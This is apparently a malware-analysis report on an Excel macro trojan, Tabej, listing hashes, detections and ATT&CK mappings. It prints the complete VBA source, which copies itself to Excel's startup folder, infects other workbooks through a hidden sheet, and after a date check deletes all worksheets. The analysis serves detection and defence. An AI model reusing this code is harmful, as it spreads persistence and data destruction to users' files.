Xls.Trojan.Tabej-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 5e30528498f6ff13…

MALICIOUS

Office (OLE)

33.0 KB Created: 1998-08-04 05:09:28 First seen: 2012-06-14
MD5: 3ebf12f7815206555c5f3514e74ae914 SHA-1: f8f701c3cfe5c71ae9af8d9d3938d4154dcccf9a SHA-256: 5e30528498f6ff13c6cacd28bec4b7464822a400543c44b787a59c3ac37f5546
220 Risk Score

Malware Insights

Xls.Trojan.Tabej-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The presence of Auto_Open and Auto_Close VBA macros, along with ClamAV detections for 'Xls.Trojan.Tabej-2', strongly indicates malicious intent. The Auto_Open macro attempts to save a copy of itself as 'tabej.xls' in the startup path, suggesting an attempt at persistence. The Auto_Close macro also contains logic that could be used for cleanup or further execution.

Heuristics 4

  • ClamAV: Xls.Trojan.Tabej-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Tabej-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1771 bytes
SHA-256: b6164b7b7862400fad982a538d45ecdded47bbe7076789dfed776b06d34e4b56
Detection
ClamAV: Xls.Trojan.Tabej-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tabej"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ""
If Windows(1).Caption = "tabej.xls" Then Workbooks.Add
s$ = Application.StartupPath & "\" & "tabej.xls"
d$ = Dir(s$)
If Not d$ = "tabej.xls" Then rx
Application.OnSheetActivate = "inf"
End Sub
Sub rx()
Attribute rx.VB_ProcData.VB_Invoke_Func = " \n14"
Application.ScreenUpdating = False
cd$ = CurDir()
ChDir Application.StartupPath
ActiveWorkbook.SaveAs filename:=Application.StartupPath & "/" & "tabej.xls"
ActiveWindow.Visible = False
ChDir cd$
Application.ScreenUpdating = True
End Sub
Sub inf()
Attribute inf.VB_ProcData.VB_Invoke_Func = " \n14"
dt = CSng(Date)
For x = 1 To ActiveWorkbook.Sheets.Count
If ActiveWorkbook.Sheets(x).Name = "tabej" Then
If ActiveWorkbook.Name <> ThisWorkbook.Name Then
If dt > 36016 Then
Application.DisplayAlerts = False
ActiveWorkbook.Sheets("tabej").Delete
Exit Sub
Application.DisplayAlerts = True
End If
End If
Exit Sub
End If
Next
Application.ScreenUpdating = False
ThisWorkbook.Sheets("tabej").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets("tabej").Visible = False
Application.ScreenUpdating = True
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
dt = CSng(Date)
If Not ActiveWorkbook Is Nothing Then
If dt > 36015 Then
If Worksheets.Count > 0 Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Worksheets.Add.Move after:=Worksheets(Worksheets.Count)
For x = 1 To Worksheets.Count - 1
Worksheets(1).Delete
Next
ThisWorkbook.Save
End If
End If
End If
Application.DisplayAlerts = True
If ThisWorkbook.Name = "tabej" Then Application.OnSheetActivate = ""
End Sub